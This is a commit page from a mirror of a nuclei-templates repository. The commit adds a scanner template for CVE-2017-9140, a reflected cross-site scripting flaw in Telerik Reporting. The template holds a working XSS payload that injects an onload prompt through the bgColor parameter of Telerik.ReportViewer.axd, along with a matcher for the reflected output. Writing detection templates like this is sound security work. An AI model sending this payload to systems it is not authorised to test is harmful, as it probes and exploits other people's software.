daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2017-9140.yaml

patch-1
Dhiyaneshwaran 2021-06-09 18:40:47 +05:30 committed by GitHub
parent 1f36178d37
commit 6c79bfa14d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
cves/2017/CVE-2017-9140.yaml Normal file
View File

@ -0,0 +1,18 @@
id: CVE-2017-9140
info:
name: CVE-2017-9140
author: dhiyaneshDk
severity: medium
tags: cve2017,xss,telerik
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
requests:
- method: GET
path:
- '{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)'
matchers:
- type: word
words:
- '<body style="background-color: #000000;" onload="prompt(1);">'
condition: and